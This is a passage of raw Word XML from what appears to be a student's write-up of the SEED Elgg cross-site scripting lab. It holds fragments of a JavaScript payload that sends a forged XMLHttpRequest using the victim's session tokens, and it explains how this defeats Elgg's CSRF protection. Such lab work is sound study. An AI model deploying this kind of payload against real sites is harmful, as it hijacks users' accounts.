                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>XMLHttpRequest</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>();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0F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:instrText>= 3 \* GB3</w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:instrText xml:space="preserve"> </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
                          <w:noProof/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>③</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000F2C47">
                        <w:rPr>
                          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0ECC61D7" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:ind w:left="840"/>
                        <w:rPr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Ajax.open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("GET</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>",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sendurl</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>,true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);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Ajax.setRequestHeader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("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>Ajax.send</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>();</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="51D23CD0" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted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}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0973CAE3" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRPr="00A91209" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsi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>&lt;/</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="end-tag"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="21"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>script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91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91209">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">modified </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> program that send the forged HTTP request to successfully post the me</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ssage, please highlight your changes and explain why you did </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>this changes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E243E2A" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRPr="00FE7B08" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="SimSun" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="SimSun" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText>= 1 \* GB3</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="SimSun" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="SimSun" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">This is to mark the execution of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71A360" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText>= 2 \* GB3</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">This is to construct the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">request </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">destination </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Samy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> id and victim’s authentication information.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75959D12" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRPr="00FE7B08" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText>= 3 \* GB3</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7B08">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> : This is to initialize the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>XMLHTTPrequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Firefox browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7BDD8" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t>.Question</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 1: Explain the purpose of lines and, why are they needed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFAB627" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRPr="00EC434B" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t xml:space="preserve">ine 1 and 2 are to bypass the countermeasure against CSRF. Without correct value in these fields, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t xml:space="preserve"> would refuse to accept the request. These parameters are only accessible within the victim’s browser with the execution a line of script. Therefore, the attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t>insert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
        <w:t xml:space="preserve"> several lines of script to acquire the correct value of these fields.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632AAFDC" w14:textId="77777777" w:rsidR="00CC22D4" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Question2: If the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t>Elgg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> application only provide the Editor mode for “About Me” field, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:eastAsia="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
          <w:b/>
        </w:rPr>
        <w:t>., you cannot switch to the Text mode, can you still launch a successful attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A985E0" w14:textId="494E7F8E" w:rsidR="00990FB0" w:rsidRDefault="00CC22D4" w:rsidP="00CC22D4">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825976">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00825976">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft JhengHei Light" w:hAnsi="Microsoft JhengHei Light"/>
